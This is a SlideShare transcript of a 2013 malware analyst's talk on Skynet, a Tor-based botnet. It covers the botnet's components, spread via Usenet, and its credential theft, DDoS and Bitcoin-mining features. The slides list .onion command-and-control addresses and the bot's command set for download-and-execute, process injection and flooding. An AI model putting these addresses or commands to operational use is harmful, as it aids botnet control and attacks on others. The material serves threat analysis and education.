Your SlideShare is downloading. ×
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
An inside look at skynet, a tor based botnet
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

An inside look at skynet, a tor based botnet

1,446

Published on

null Hyderabad Chapter - August 2013 Meet

null Hyderabad Chapter - August 2013 Meet

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,446
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
19
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. The content here I show is only for education purpose only. I am not responsible for your actions. The views/ideas/knowledge expressed here are solely myself and nothing to do with the company or the organization in which I am currently working.
  • 2. Srinu K • Working as a malware analyst at Online Guards • Having 2+ years of experience working with malware • Seasoned Penetration tester and Forensic investigator • LinkedIn: http://in.linkedin.com/pub/srinu- neo/39/806/712
  • 3. Size: ~ 15 MB Skynet is bundled with 4 main components. 1. Tor Client for windows 2. Zeus bot 3. CGMiner 4. Opencl.dll
  • 4. Spreading: via Usenet downloads Capabilities: 1. Tor Communication 2. Credential grabbing 3. DDOS 4. IRC 5. Bit Coin Mining
  • 5. Botnet Size: > 12,000 zombies
  • 6. Zeus king of botnets
  • 7. 6ceyqong6nxy7hwp.onion owbm3sjqdnndmydf.onion 4njzp3wzi6leo772.onion qdzjxwujdtxrjkrz.onion x3wyzqg6cfbqrwht.onion niazgxzlrbpevgvq.onion ua4ttfm47jt32igm.onion 6tkpktox73usm5vq.onion 4bx2tfgsctov65ch.onion gpt2u5hhaqvmnwhr.onion 7wuwk3aybq5z73m7.onion 742yhnr32ntzhx3f.onion f2ylgv2jochpzm4c.onion 6m7m4bsdbzsflego.onion xvauhzlpkirnzghg.onion h266x4kmvmpdfalv.onion jr6t4gi4k2vpry5c.onion ceif2rmdoput3wjh.onion uzvyltfdj37rhqfy.onion uy5t7cus7dptkchs.onion
  • 8. Feature Commands Get information on the compromised computer !info !version !hardware !idle Download and execute files !download Download a binary to memory and inject it into other processes !download.mem Visit a webpage !visit !visit.post SYN and UDP flooding !syn !syn.stop !udp !udp.stop Slowloris flooding !slowloris!slowloris.stop HTTP flooding !http.bwrape!http.bwrape.stop Open a SOCKS proxy !socks Retrieve .onion address of the Hidden Service opened on the compromised computer !ip
  • 9. Botnet only mines if the computer is unused for 2 minutes and if the owner gets back it stops mining immediately. Skynet installs a WH_MOUSE and a WH_KEYBOARD hook procedures that monitor the systems for keystrokes or mouse movements.
  • 10. Another tor based botnet is “Atrax”. In future we are able to see more botnets adopt tor as a communication channel.
  • 11. Rapid7

×